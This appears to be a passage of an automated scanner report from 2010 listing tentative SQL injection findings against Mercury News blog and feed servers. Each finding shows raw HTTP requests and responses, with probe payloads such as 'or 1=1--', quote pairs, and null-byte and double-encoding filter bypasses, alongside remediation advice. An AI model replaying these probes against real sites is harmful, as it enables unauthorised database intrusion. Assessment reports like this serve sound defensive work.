GET /aei/2010/12%2527%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 301 Moved Permanently
Date: Tue, 07 Dec 2010 23:12:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/aei/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:27 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 84


<!-- Page not cached by WP Super Cache. No closing HTML tag. Check your theme. -->

1.3. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 53405733%20or%201%3d1--%20 and 53405733%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:16 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>Database Error</title>

</head>
<body>
   <h1>Error establishing a database connection</h1>
</body>
</html>

Request 2

GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:09:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/aei/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 35229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



<title>Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! | A+E Interactive</title>

<meta name="generator" content="WordPress" />
<link rel="alternate" type="application/rss+xml" title="A+E Interactive &raquo; Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! Comments Feed" href="http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/feed/" />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/aei/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/aei/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/aei/wp-includes/wlwmanifest.xml" />
<link rel='index' title='A+E Interactive' href='http://blogs.mercurynews.com/aei' />
<link rel='start' title='A massive mea culpa and apology for a bad Mass Effect review' href='http://blogs.mercurynews.com/aei/2008/01/01/a_massive_mea_culpa_and_apology_for_a_bad_mass_effect_review/' />
<link rel='prev' title='Review: Leonard Cohen in Oakland' href='http://blogs.mercurynews.com/aei/2010/12/07/review-leonard-cohen-in-oakland/' />
<meta name="generator" content="WordPress 2.8.4" />
<meta name="descrip
...[SNIP]...

1.4. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /extrabaggs/?1%00'=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:08:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:08:59 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/?1%00''=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:08:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 51759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.5. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:12:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 26467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.6. http://blogs.mercurynews.com/extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /extrabaggs/2010/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:12:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:12:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:12:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/extrabaggs/xmlrpc.php
Last-Modified: Tue, 07 Dec 2010 22:11:32 GMT
ETag: "069f2646a14ec4ebda36831859212c47"
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/xml; charset=UTF-8
Content-Length: 960

<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:atom="http://www.w3.org/2005/Atom
...[SNIP]...

1.7. http://blogs.mercurynews.com/kawakami/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /kawakami/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /kawakami%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /kawakami%2527%2527/?p=9831 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 07 Dec 2010 23:13:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 7611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org
...[SNIP]...

1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /sharks/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /sharks/?1%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:09:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:09:07 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

Request 2

GET /sharks/?1%2527%2527=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:09:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/sharks/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54200

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...

1.9. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /sharks/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sharks/?p=4471&1%20and%201%3d1--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:11:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:11:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <title>Database Error</title>

</head>
<body>
   <h1>Error establishing a database connection</h1>
</body>
</html>

Request 2

GET /sharks/?p=4471&1%20and%201%3d2--%20=1 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:11:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://blogs.mercurynews.com/sharks/xmlrpc.php
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 54578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



<title>Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings | Working the Corners</title>

<meta name="generator" content="WordPress" />
<link rel="alternate" type="application/rss+xml" title="Working the Corners &raquo; Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings Comments Feed" href="http://blogs.mercurynews.com/sharks/2010/12/07/so-which-goalie-gets-the-start-against-flyers-may-not-be-an-easy-call-after-win-over-red-wings/feed/" />
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/sharks/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/sharks/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/sharks/wp-includes/wlwmanifest.xml" />
<link rel='index' title='Working the Corners' href='http://blogs.mercurynews.com/sharks' />
<link rel='start' title='Finding teal connections in Prague' href='http://blogs.mercurynews.com/sharks/2007/09/24/finding-teal-connections-in-prague/' />
<link rel='prev' title='Talk about your turnaround &#8212; Sharks get revenge against Detroit, but coach still unhappy over start' href='http://blogs.mercurynews.com/sharks/2010/12/06/4464/' />
...[SNIP]...

1.10. http://blogs.mercurynews.com/warriors/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://blogs.mercurynews.com
Path:   /warriors/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Tue, 07 Dec 2010 23:13:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Dec 2010 23:09:52 GMT
ETag: "3ee0ec-4e85d-1a1d3000"
Accept-Ranges: bytes
Content-Length: 321629
Cache-Control: max-age=300, must-revalidate
Expires: Tue, 07 Dec 2010 23:18:53 GMT
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://
...[SNIP]...
e things and, in fact, you can usually get signals that the coach is if he sits a player, other than to rest. Our lack of depth, especially a guard, makes that tough to do. But Smart does it when the errors are too much to ignore. Listen to &#8220;neutral&#8221; announcers in nationally telecast games or sometimes even in the other team&#8217;s feed, if you get a half-way honest announcer. You&#8217;ll
...[SNIP]...

Request 2

GET /warriors/?p=1744 HTTP/1.1
Host: blogs.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 500 Internal Server Error
Date: Tue, 07 Dec 2010 23:13:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Tue, 07 Dec 2010 23:13:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 358
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-
...[SNIP]...

1.11. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200125.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200125.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:18:26 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200125.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:18:26 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.12. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200222.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200222.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:07 GMT
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:08 GMT
Connection: close

